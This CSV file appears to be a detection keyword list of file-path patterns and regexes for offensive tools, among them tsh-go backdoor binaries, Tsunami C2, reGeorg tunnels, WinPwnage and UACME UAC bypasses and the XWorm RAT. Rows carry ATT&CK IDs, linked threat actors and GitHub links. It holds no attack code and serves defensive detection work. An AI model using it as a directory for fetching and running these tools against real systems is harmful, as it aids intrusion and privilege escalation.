"*/trufflehog:latest *",".{0,1000}\/trufflehog\:latest\s.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","12103"
"*/TruffleSnout.exe*",".{0,1000}\/TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12104"
"*/TruffleSnout.exe*",".{0,1000}\/TruffleSnout\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12105"
"*/trusted_sec_bofs/*",".{0,1000}\/trusted_sec_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","12106"
"*/trusted_sec_remote_bofs/*",".{0,1000}\/trusted_sec_remote_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","12107"
"*/TrustedWave_x64.exe*",".{0,1000}\/TrustedWave_x64\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12108"
"*/tsh_linux_amd64*",".{0,1000}\/tsh_linux_amd64.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12109"
"*/tsh_windows_amd64.exe*",".{0,1000}\/tsh_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12110"
"*/tshd.go*",".{0,1000}\/tshd\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12111"
"*/tshd_linux_amd64*",".{0,1000}\/tshd_linux_amd64.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","#linux","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12112"
"*/tshd_windows.go*",".{0,1000}\/tshd_windows\.go.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12113"
"*/tshd_windows_amd64.exe*",".{0,1000}\/tshd_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12114"
"*/tsh-go.git*",".{0,1000}\/tsh\-go\.git.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","1","N/A","N/A","10","2","161","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z","12115"
"*/tso-brute.nse*",".{0,1000}\/tso\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12116"
"*/tso-enum.nse*",".{0,1000}\/tso\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12117"
"*/tsunami.py*",".{0,1000}\/tsunami\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12118"
"*/tsunami_warning.py*",".{0,1000}\/tsunami_warning\.py.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12119"
"*/TsunamiServer/*",".{0,1000}\/TsunamiServer\/.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12120"
"*/TsunamiWave_x64.exe*",".{0,1000}\/TsunamiWave_x64\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","12121"
"*/tun2socks.git*",".{0,1000}\/tun2socks\.git.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12122"
"*/tun2socks/*",".{0,1000}\/tun2socks\/.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12123"
"*/tun2socks-darwin*",".{0,1000}\/tun2socks\-darwin.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","#linux","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12124"
"*/tun2socks-freebsd*",".{0,1000}\/tun2socks\-freebsd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12125"
"*/tun2socks-linux*",".{0,1000}\/tun2socks\-linux.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","#linux","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12126"
"*/tun2socks-openbsd*",".{0,1000}\/tun2socks\-openbsd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12127"
"*/tun2socks-windows*",".{0,1000}\/tun2socks\-windows.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","1","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","12128"
"*/tunnel.nosocket.php*",".{0,1000}\/tunnel\.nosocket\.php.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","12130"
"*/tunnel.tomcat.5.jsp*",".{0,1000}\/tunnel\.tomcat\.5\.jsp.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","12131"
"*/tunnel-socks5.py*",".{0,1000}\/tunnel\-socks5\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#linux","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","12167"
"*/TunnelVision.git*",".{0,1000}\/TunnelVision\.git.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","12173"
"*/TunnelVisionVM.ova*",".{0,1000}\/TunnelVisionVM\.ova.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","12174"
"*/turbo-intruder-all.jar*",".{0,1000}\/turbo\-intruder\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","12179"
"*/tweetshell.sh*",".{0,1000}\/tweetshell\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","12180"
"*/twittor.git*",".{0,1000}\/twittor\.git.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","N/A","10","10","771","217","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z","12181"
"*/uac.py*",".{0,1000}\/uac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12182"
"*/uac_bypass.py*",".{0,1000}\/uac_bypass\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","12183"
"*/uac_cmstp.py*",".{0,1000}\/uac_cmstp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12184"
"*/uac_compmgmtlauncher.py*",".{0,1000}\/uac_compmgmtlauncher\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12185"
"*/uac_computerdefaults.py*",".{0,1000}\/uac_computerdefaults\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12186"
"*/uac_dll_cliconfg.py*",".{0,1000}\/uac_dll_cliconfg\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12187"
"*/uac_dll_mcx2prov.py*",".{0,1000}\/uac_dll_mcx2prov\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12188"
"*/uac_dll_migwiz.py*",".{0,1000}\/uac_dll_migwiz\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12189"
"*/uac_dll_sysprep.py*",".{0,1000}\/uac_dll_sysprep\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12190"
"*/uac_dotnet.py*",".{0,1000}\/uac_dotnet\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12191"
"*/uac_eventviewer.py*",".{0,1000}\/uac_eventviewer\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12192"
"*/uac_fodhelper.py*",".{0,1000}\/uac_fodhelper\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12193"
"*/uac_mockdir.py*",".{0,1000}\/uac_mockdir\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12194"
"*/uac_perfmon.py*",".{0,1000}\/uac_perfmon\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12195"
"*/uac_runas.py*",".{0,1000}\/uac_runas\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12196"
"*/uac_sdclt.py*",".{0,1000}\/uac_sdclt\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12197"
"*/uac_sdcltcontrol.py*",".{0,1000}\/uac_sdcltcontrol\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12198"
"*/uac_sdcltisolatedcommand.py*",".{0,1000}\/uac_sdcltisolatedcommand\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12199"
"*/uac_silentcleanup.py*",".{0,1000}\/uac_silentcleanup\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12200"
"*/uac_slui.py*",".{0,1000}\/uac_slui\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12201"
"*/uac_token_manipulation.py*",".{0,1000}\/uac_token_manipulation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12202"
"*/uac_wsreset.py*",".{0,1000}\/uac_wsreset\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12203"
"*/UAC-BOF-Bonanza.git*",".{0,1000}\/UAC\-BOF\-Bonanza\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","12204"
"*/UACBypass.dll*",".{0,1000}\/UACBypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12205"
"*/UAC-Bypass.ps1*",".{0,1000}\/UAC\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","1","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","12206"
"*/UACBypasses/*",".{0,1000}\/UACBypasses\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","12207"
"*/UacInfo64.exe*",".{0,1000}\/UacInfo64\.exe.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","1","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","12208"
"*/UACME.git*",".{0,1000}\/UACME\.git.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","1","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","12209"
